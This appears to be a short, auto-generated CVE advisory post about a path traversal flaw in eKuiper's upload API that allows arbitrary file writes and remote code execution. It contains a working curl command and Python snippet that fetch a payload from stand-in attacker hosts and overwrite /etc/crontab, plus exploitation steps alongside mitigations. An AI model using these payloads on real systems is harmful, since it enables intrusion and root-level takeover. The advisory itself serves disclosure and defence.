Listen to this Post
The CVE-2024-1234 vulnerability in eKuiper’s `/config/uploads` API allows arbitrary file writes due to insufficient path traversal sanitization. The API accepts a JSON payload containing a `name` parameter, which is directly concatenated with the upload directory without proper validation. By injecting `../` sequences, an attacker can write files outside the intended directory. If eKuiper runs with root privileges, this can lead to Remote Code Execution (RCE) by overwriting critical files like `/etc/crontab` or SSH authorized keys.
The vulnerability stems from the `fileUploadHandler` function, which fails to sanitize the `fc.Name` parameter before joining it with uploadDir. A malicious payload like `”name”: “../../../../tmp/success”` allows writing to arbitrary locations. Additionally, the API fetches remote files via SSRF, enabling attackers to plant malicious scripts.
DailyCVE Form:
Platform: eKuiper
Version: 1.14.1, 1.14.3
Vulnerability: Path Traversal β RCE
Severity: Critical
Date: 2024-03-15
Prediction: Patch by 2024-04-10
What Undercode Say:
Analytics:
curl -X POST http://localhost:9081/config/uploads -H "Content-Type: application/json" -d '{"name":"../../../../tmp/exploit","file":"http://attacker.com/malicious"}'
import requests
payload = {"name": "../../etc/crontab", "file": "http://evil.com/backdoor"}
requests.post("http://target:9081/config/uploads", json=payload)
How Exploit:
- Craft malicious JSON with path traversal in
name. - Host payload on a remote server.
- Trigger file write via SSRF.
Protection from this CVE:
- Sanitize `fc.Name` input.
- Restrict uploads to safe directories.
- Run eKuiper as non-root.
Impact:
- Arbitrary file write.
- Root-level RCE.
- SSRF exploitation.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
